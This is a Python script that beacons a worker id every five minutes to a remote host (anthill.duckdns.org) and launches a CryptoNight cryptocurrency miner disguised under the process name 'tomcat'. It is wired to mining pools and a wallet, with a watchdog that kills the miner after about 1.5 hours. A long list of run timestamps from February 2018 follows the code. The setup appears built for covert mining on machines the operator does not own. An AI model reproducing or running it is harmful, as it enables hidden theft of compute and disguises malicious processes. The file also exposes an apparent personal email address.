import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:04.152401
#2018-02-17 16:03:01.531464
#2018-02-17 17:49:01.460602
#2018-02-17 19:37:01.240523
#2018-02-17 21:27:07.259345
#2018-02-17 23:11:03.755878
#2018-02-18 00:58:01.475857
#2018-02-18 02:46:04.439455
#2018-02-18 04:33:06.854895
#2018-02-18 06:26:01.471052
#2018-02-18 08:15:08.385768
#2018-02-18 10:03:01.467255
#2018-02-18 11:49:04.709422
#2018-02-18 13:34:03.322263
#2018-02-18 15:24:05.534795
#2018-02-18 17:12:07.666175
#2018-02-18 19:00:09.849012
#2018-02-18 20:47:03.665265
#2018-02-18 22:33:04.385759
#2018-02-19 00:20:08.241096
#2018-02-19 02:06:06.451993
#2018-02-19 03:53:04.197928
#2018-02-19 05:38:04.415311
#2018-02-19 07:26:05.831183
#2018-02-19 09:16:04.941430
#2018-02-19 11:05:08.572176
#2018-02-19 12:52:04.455528
#2018-02-19 14:40:01.401178
#2018-02-19 16:27:08.220961
#2018-02-19 18:14:04.629899
#2018-02-19 20:00:05.355171
#2018-02-19 21:48:06.360403
#2018-02-19 23:34:07.273081
#2018-02-20 01:19:05.160683
#2018-02-20 03:08:05.376231
#2018-02-20 04:55:01.909997
#2018-02-20 06:38:05.104831
#2018-02-20 08:23:01.889867
#2018-02-20 10:08:08.051404
#2018-02-20 11:53:05.696189
#2018-02-20 13:42:05.067561
#2018-02-20 15:26:07.046403
#2018-02-20 17:11:08.140715
#2018-02-20 19:02:11.225090
#2018-02-20 20:52:01.286454
#2018-02-20 22:38:04.829850
#2018-02-21 00:19:06.352924
#2018-02-21 02:06:01.509944
#2018-02-21 03:53:08.085753
#2018-02-21 05:40:04.431560
#2018-02-21 07:29:06.675756
#2018-02-21 09:14:01.416985
#2018-02-21 11:03:01.906063
#2018-02-21 12:50:15.602942
#2018-02-21 14:39:04.864328
#2018-02-21 16:26:06.078067
#2018-02-21 18:18:02.162331
#2018-02-21 20:04:04.635347
#2018-02-21 21:51:01.627386
#2018-02-21 23:40:06.336703
#2018-02-22 01:30:07.642426
#2018-02-22 03:18:06.708081
#2018-02-22 05:05:07.538927
#2018-02-22 06:47:07.281491
#2018-02-22 08:35:08.134992
#2018-02-22 10:22:06.323833
#2018-02-22 12:08:02.045045
#2018-02-22 13:53:07.756469
#2018-02-22 15:40:05.149603
#2018-02-22 17:26:02.102993
#2018-02-22 19:15:03.972479
#2018-02-22 21:07:08.542721
#2018-02-22 22:51:06.606520
#2018-02-23 00:38:05.828332
#2018-02-23 02:24:04.179262
#2018-02-23 04:13:06.301790
#2018-02-23 05:59:06.961464
#2018-02-23 07:32:05.987805
#2018-02-23 09:35:07.601400
#2018-02-23 11:19:04.430861
#2018-02-23 12:36:01.563664
#2018-02-23 14:02:04.258746
#2018-02-23 15:38:03.112813
#2018-02-23 17:12:05.974008
#2018-02-23 18:47:06.213991
#2018-02-23 20:19:01.819827
#2018-02-23 21:53:07.098531
#2018-02-23 23:32:06.950492
#2018-02-24 01:06:05.795821
#2018-02-24 02:45:07.651894
#2018-02-24 04:22:01.519637
#2018-02-24 05:51:06.454781
#2018-02-24 07:29:07.560174
#2018-02-24 09:03:04.188796
#2018-02-24 10:52:07.180340
#2018-02-24 12:40:01.339600
#2018-02-24 14:28:03.362083
#2018-02-24 16:15:09.052943
#2018-02-24 18:08:04.643127
#2018-02-24 19:54:04.294261
#2018-02-24 21:39:01.652195
#2018-02-25 00:29:03.787777
#2018-02-25 04:24:04.408221
#2018-02-25 07:56:06.274445